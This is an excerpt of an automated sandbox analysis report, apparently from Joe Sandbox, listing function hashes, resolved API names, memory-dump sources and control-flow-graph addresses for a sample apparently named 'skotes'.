                                  • Opcode ID: ae59dd5ba2c14c3a1103299f7a0bfa5cca40965c91aee7766a7fda79aca92ae5
                                  • Instruction ID: 208b0c57f86b66a7a1aa69d69f3c2ff34cd0f0ee73bb74300c7c1fe86f13191f
                                  • Opcode Fuzzy Hash: ae59dd5ba2c14c3a1103299f7a0bfa5cca40965c91aee7766a7fda79aca92ae5
                                  • Instruction Fuzzy Hash: 1EB15A71614604CFD718CF28C486BA57BA0FF45368F259659E8D9DF3A1D335E982CB40
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2957757618.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000006.00000002.2957729682.0000000000E90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957757618.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957850157.0000000000EF9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.0000000000EFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.000000000107E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.0000000001155000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.0000000001184000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.000000000118E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.000000000119B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2958387680.000000000119C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2958567834.0000000001331000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2958596451.0000000001332000.00000080.00000001.01000000.00000007.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e90000_skotes.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 46b04ec41cc4f0b4dd8c16c9c1800e2e2cfd7180c07b47fc686bb78de104e0c8
                                  • Instruction ID: ddad01e5e489ba2bcfc86a8ec97a9e43fa0f63a26416a5a81d3ff37f9e181054
                                  • Opcode Fuzzy Hash: 46b04ec41cc4f0b4dd8c16c9c1800e2e2cfd7180c07b47fc686bb78de104e0c8
                                  • Instruction Fuzzy Hash: BD81FBB4A012458FEB15CF69D890BEEFBF1FB5A304F141269D950B7392C331994ACBA0
                                  APIs
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 00E924BE
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2957757618.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000006.00000002.2957729682.0000000000E90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957757618.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957850157.0000000000EF9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.0000000000EFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.000000000107E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.0000000001155000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.0000000001184000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.000000000118E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.000000000119B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2958387680.000000000119C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2958567834.0000000001331000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2958596451.0000000001332000.00000080.00000001.01000000.00000007.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e90000_skotes.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_copy
                                  • String ID:
                                  • API String ID: 2659868963-0
                                  • Opcode ID: 3723451e908b1dcc61f768f214726208bc0e9ae7959b2116d70a57890a94c835
                                  • Instruction ID: bdf0481a8ec5eca73125f7957cd13db729ce7f529667a01d53362572e75fd8b7
                                  • Opcode Fuzzy Hash: 3723451e908b1dcc61f768f214726208bc0e9ae7959b2116d70a57890a94c835
                                  • Instruction Fuzzy Hash: 3B51DEB2E046069FDB15CF59DC817AAB7F0FB98318F24856AD506FF690D730A944CB90
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2957757618.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000006.00000002.2957729682.0000000000E90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957757618.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957850157.0000000000EF9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.0000000000EFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.000000000107E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.0000000001155000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.0000000001184000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.000000000118E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.000000000119B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2958387680.000000000119C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2958567834.0000000001331000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2958596451.0000000001332000.00000080.00000001.01000000.00000007.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e90000_skotes.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0d0252e9aeb661f4215443df75a30aaef9b35ee874e6079b27735c2d6c7ca350
                                  • Instruction ID: 3fbadc2c74657ed7bdd474fe1424507d0f68e48454515d5d0cdd47adfa2b6239
                                  • Opcode Fuzzy Hash: 0d0252e9aeb661f4215443df75a30aaef9b35ee874e6079b27735c2d6c7ca350
                                  • Instruction Fuzzy Hash: 4121B673F208394B770CC57E8C5227DB6E1C78C541745423AE8A6EA2C1D968D917E2E4
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2957757618.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000006.00000002.2957729682.0000000000E90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957757618.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957850157.0000000000EF9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.0000000000EFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.000000000107E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.0000000001155000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.0000000001184000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.000000000118E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.000000000119B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2958387680.000000000119C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2958567834.0000000001331000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2958596451.0000000001332000.00000080.00000001.01000000.00000007.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e90000_skotes.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b8208cdfbb9935377fba52fcef031a92135a40846ae0fc56bc3f0d9b9ca180fd
                                  • Instruction ID: 9bdc67d3407102a3bcd27ccb8cdc52dc72d83ba74735a9b04f7479f62893b00e
                                  • Opcode Fuzzy Hash: b8208cdfbb9935377fba52fcef031a92135a40846ae0fc56bc3f0d9b9ca180fd
                                  • Instruction Fuzzy Hash: 70117323F30C256A675C816D8C172BAA5D2EBD825071F533AD826E7384E9A4DE23D290
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2957757618.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000006.00000002.2957729682.0000000000E90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957757618.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957850157.0000000000EF9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.0000000000EFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.000000000107E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.0000000001155000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.0000000001184000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.000000000118E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.000000000119B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2958387680.000000000119C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2958567834.0000000001331000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2958596451.0000000001332000.00000080.00000001.01000000.00000007.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e90000_skotes.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                  • Instruction ID: 1d3c82582386a44715c853ee2bdac9d21cc47ac9bbc22bfde5f4ee5dfddaae2d
                                  • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                  • Instruction Fuzzy Hash: 6B112B7F60018243E60C862DCAB45B7E795EBC53297ED637BD0827B758DA22E947B600
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2957757618.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000006.00000002.2957729682.0000000000E90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957757618.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957850157.0000000000EF9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.0000000000EFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.000000000107E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.0000000001155000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.0000000001184000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.000000000118E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.000000000119B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2958387680.000000000119C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2958567834.0000000001331000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2958596451.0000000001332000.00000080.00000001.01000000.00000007.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e90000_skotes.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 527fb345d153c74316b1e162b4f5f74f073da68e101651118a59bd16bd25978c
                                  • Instruction ID: 2c51b22e9e683ce4a9dfa63bbd31e3360e7daa75a2ca5b7c692f18a8c7c7a0d0
                                  • Opcode Fuzzy Hash: 527fb345d153c74316b1e162b4f5f74f073da68e101651118a59bd16bd25978c
                                  • Instruction Fuzzy Hash: 39E086340401486FCF257B18CA19E8F3BD9EB5174DF141C18FD145A221CB26ED52C680
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2957757618.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000006.00000002.2957729682.0000000000E90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957757618.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957850157.0000000000EF9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.0000000000EFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.000000000107E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.0000000001155000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.0000000001184000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.000000000118E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.000000000119B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2958387680.000000000119C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2958567834.0000000001331000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2958596451.0000000001332000.00000080.00000001.01000000.00000007.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e90000_skotes.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                                  • Instruction ID: e932c59ef1be3749eabb0148cdb8fb42ffd00445632554958e30ba7a29f01519
                                  • Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                                  • Instruction Fuzzy Hash: B2E04632921268EBCB14DB9C8A05E8AB2ECEB49B04B6911AAB501E3151C271DE01C7D0

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 4584 e92ec0-e92f04 4585 e92f7e-e92f92 call eab6b8 4584->4585 4586 e92f06-e92f17 call eac6ac 4584->4586 4591 e92f94-e92fae 4585->4591 4592 e92ff6-e93001 4585->4592 4593 e92f1d-e92f25 4586->4593 4594 e9301e-e9301f call eac26a 4586->4594 4591->4592 4605 e92fb0-e92fbe call eac6ac 4591->4605 4595 e9300a-e9301b 4592->4595 4596 e93003-e93005 4592->4596 4598 e92f55-e92f69 call eac6d1 4593->4598 4599 e92f27-e92f45 call ead3e2 4593->4599 4602 e93024-e93025 call eac26a 4594->4602 4596->4595 4598->4602 4610 e92f6f-e92f78 4598->4610 4608 e92f4c-e92f4f 4599->4608 4609 e92f47-e92f4a 4599->4609 4612 e9302a-e9302b call eac26a 4602->4612 4605->4612 4616 e92fc0-e92fd6 call eac6d1 4605->4616 4614 e92f52 4608->4614 4609->4614 4610->4585 4610->4595 4617 e93030-e93031 call eac26a 4612->4617 4614->4598 4616->4617 4622 e92fd8-e92fed call eabd0b 4616->4622 4621 e93036-e93085 call eac26a call eac6ac 4617->4621 4630 e9308b-e93093 4621->4630 4631 e931c5-e931c6 call eac26a 4621->4631 4622->4621 4628 e92fef 4622->4628 4628->4592 4633 e93095 4630->4633 4634 e930e6-e930ea 4630->4634 4635 e931cb-e931cc call eac26a 4631->4635 4636 e93097-e9309c 4633->4636 4637 e930ed-e930ff call eac6d1 4634->4637 4642 e931d1-e931d2 call eac26a 4635->4642 4639 e930a8-e930aa 4636->4639 4640 e9309e-e930a4 4636->4640 4637->4635 4650 e93105-e9310f 4637->4650 4645 e930ac-e930af 4639->4645 4646 e930b1 4639->4646 4640->4636 4643 e930a6 4640->4643 4654 e931d7-e931dd call eac26a 4642->4654 4649 e930c8-e930db 4643->4649 4647 e930b4-e930b8 4645->4647 4646->4647 4651 e930ba 4647->4651 4652 e930bd-e930c5 call ead663 4647->4652 4649->4637 4653 e930dd-e930e4 4649->4653 4655 e93115-e93122 4650->4655 4656 e931a7-e931c2 call eacff1 4650->4656 4651->4652 4652->4649 4653->4637 4660 e9312b 4655->4660 4661 e93124-e93129 4655->4661 4660->4656 4662 e93132-e93139 call eab6b8 4660->4662 4661->4660 4661->4662 4662->4656 4669 e9313b-e93145 4662->4669 4669->4656 4670 e93147-e93164 call eac6ac 4669->4670 4670->4642 4673 e93166-e93177 4670->4673 4674 e93179 4673->4674 4675 e93193-e931a5 call eac6d1 4673->4675 4676 e93180-e9318c call eabd4c 4674->4676 4675->4654 4675->4656 4676->4631 4681 e9318e-e93191 4676->4681 4681->4675 4681->4676
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2957757618.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000006.00000002.2957729682.0000000000E90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957757618.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957850157.0000000000EF9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.0000000000EFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.000000000107E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.0000000001155000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.0000000001184000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.000000000118E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.000000000119B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2958387680.000000000119C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2958567834.0000000001331000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2958596451.0000000001332000.00000080.00000001.01000000.00000007.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e90000_skotes.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Mtx_unlock$Cnd_broadcast
                                  • String ID:
                                  • API String ID: 32384418-0
                                  • Opcode ID: 04b512564ecba2f9366627b8de7fbe223d3c307752dc66cb367a960cef9ade1c
                                  • Instruction ID: aac3189be78ddf4b120490e20fbb246393794c00a66d73edad4d05f078f66442
                                  • Opcode Fuzzy Hash: 04b512564ecba2f9366627b8de7fbe223d3c307752dc66cb367a960cef9ade1c
                                  • Instruction Fuzzy Hash: D1A1BFB0A01605AFDF20DB75C9447AAB7E8FF19318F14A169E815FB251EB31EA04CB91

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 4682 eccbdf-eccbef 4683 eccbf1 4682->4683 4684 eccbf3-eccc0b call ec690a 4682->4684 4683->4684 4687 eccc0d-eccc1c call ec75f6 call ec6c5a 4684->4687 4688 eccc21-eccc38 4684->4688 4709 eccee1-eccee7 4687->4709 4690 eccc8a-eccc8e 4688->4690 4691 eccc3a-eccc59 call eccef8 4688->4691 4692 eccc9d-eccccb 4690->4692 4693 eccc90 4690->4693 4706 eccc5b-eccc5e 4691->4706 4707 eccc63-eccc6f call ed8570 4691->4707 4699 eccccd-ecccdb 4692->4699 4700 eccceb 4692->4700 4696 eccc96-eccc9a 4693->4696 4697 eccc92-eccc94 4693->4697 4696->4692 4697->4692 4697->4696 4703 ecccdd-eccce0 4699->4703 4704 eccce2-eccce9 4699->4704 4705 ecccee 4700->4705 4710 ecccf0-ecccf8 4703->4710 4704->4705 4705->4710 4706->4709 4717 eccc71-eccc7f 4707->4717 4718 eccc83-eccc85 4707->4718 4712 eccee9-ecceec 4709->4712 4713 eccef3-eccef7 4709->4713 4714 ecccfe-eccd09 4710->4714 4715 ecccfa-ecccfc 4710->4715 4712->4713 4716 eccd0b-eccd18 4714->4716 4715->4716 4719 eccd1a-eccd1c 4716->4719 4720 eccd22-eccd32 4716->4720 4717->4718 4718->4709 4719->4720 4721 eccde6-eccde8 4719->4721 4722 eccd35-eccd37 4720->4722 4725 eccdfd-ecce03 4721->4725 4726 eccdea-eccdfa call ec40f0 4721->4726 4723 eccd89-eccd8f 4722->4723 4724 eccd39-eccd5f call ed8480 4722->4724 4723->4721 4729 eccd91-eccdaf call ed8480 4723->4729 4737 eccd64-eccd87 4724->4737 4738 eccd61 4724->4738 4730 ecce0a-ecce38 call ed8480 4725->4730 4731 ecce05-ecce07 4725->4731 4726->4725 4729->4721 4742 eccdb1-eccdb6 4729->4742 4740 ecce3a 4730->4740 4741 ecce44-ecce4d 4730->4741 4731->4730 4737->4722 4737->4723 4738->4737 4743 ecce3c-ecce3e 4740->4743 4744 ecce40-ecce42 4740->4744 4745 ecce4e-ecce5c 4741->4745 4746 eccdb7-eccdbc 4742->4746 4743->4741 4743->4744 4744->4745 4749 ecce5e-ecce63 4745->4749 4750 ecce86-ecce88 4745->4750 4747 eccdbe-eccdc1 4746->4747 4748 eccdc3-eccdc6 4746->4748 4747->4748 4751 eccdc8-eccdce 4747->4751 4748->4746 4752 ecce69-ecce84 call ed82e0 4749->4752 4753 ecce65-ecce67 4749->4753 4754 ecce8a-ecce8c 4750->4754 4755 ecce95-ecceaf call ed82e0 4750->4755 4757 eccdd0-eccdd3 4751->4757 4758 eccde3 4751->4758 4752->4750 4753->4750 4753->4752 4760 ecce8e 4754->4760 4761 ecceb1-ecceb3 4754->4761 4755->4761 4765 eccddd 4757->4765 4766 eccdd5-eccddb 4757->4766 4758->4721 4760->4755 4768 ecce90-ecce93 4760->4768 4763 ecceb5-ecceb7 4761->4763 4764 eccec0-ecced5 call ed82e0 4761->4764 4769 ecceb9 4763->4769 4770 ecced7-eccedf 4763->4770 4764->4770 4771 eccddf-eccde1 4765->4771 4766->4771 4768->4755 4768->4761 4769->4764 4773 eccebb-eccebe 4769->4773 4770->4709 4771->4721 4773->4764 4773->4770
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2957757618.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000006.00000002.2957729682.0000000000E90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957757618.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957850157.0000000000EF9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.0000000000EFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.000000000107E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.0000000001155000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.0000000001184000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.000000000118E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.000000000119B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2958387680.000000000119C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2958567834.0000000001331000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2958596451.0000000001332000.00000080.00000001.01000000.00000007.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e90000_skotes.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _strrchr
                                  • String ID:
                                  • API String ID: 3213747228-0
                                  • Opcode ID: 254d999fa369d06fd7d93151cbf4a8417e2da6d6341328512c40b930a69fa730
                                  • Instruction ID: cdab727d4dbd46ce02e933438bdc7c6d99c8c6f31a9248edf2bcb3428cecce1c
                                  • Opcode Fuzzy Hash: 254d999fa369d06fd7d93151cbf4a8417e2da6d6341328512c40b930a69fa730
                                  • Instruction Fuzzy Hash: A0B101329002459FDB158F28CA81FBEBBE5EF46344F2451AEE859FB241D6368D03CB60
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2957757618.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000006.00000002.2957729682.0000000000E90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957757618.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957850157.0000000000EF9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.0000000000EFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.000000000107E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.0000000001155000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.0000000001184000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.000000000118E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.000000000119B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2958387680.000000000119C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2958567834.0000000001331000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2958596451.0000000001332000.00000080.00000001.01000000.00000007.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e90000_skotes.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Xtime_diff_to_millis2_xtime_get
                                  • String ID:
                                  • API String ID: 531285432-0
                                  • Opcode ID: 07cc57868f07faaa696404fc964ed6b8fbde687e6ab5772d50c5dbdf029ac08a
                                  • Instruction ID: 3f005f0bc1a03725a0b0e0e055a572780ae561d902dcd1620fd64633f3a8cb6e
                                  • Opcode Fuzzy Hash: 07cc57868f07faaa696404fc964ed6b8fbde687e6ab5772d50c5dbdf029ac08a
                                  • Instruction Fuzzy Hash: DE211D75A00119AFDF00EBA4DC819BEB7F9EF4D714F111055F601BB261DB70AD419BA0
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00E9E4F9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2957757618.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000006.00000002.2957729682.0000000000E90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957757618.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957850157.0000000000EF9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.0000000000EFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.000000000107E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.0000000001155000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.0000000001184000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.000000000118E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.000000000119B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2958387680.000000000119C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2958567834.0000000001331000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2958596451.0000000001332000.00000080.00000001.01000000.00000007.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e90000_skotes.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Xinvalid_argumentstd::_
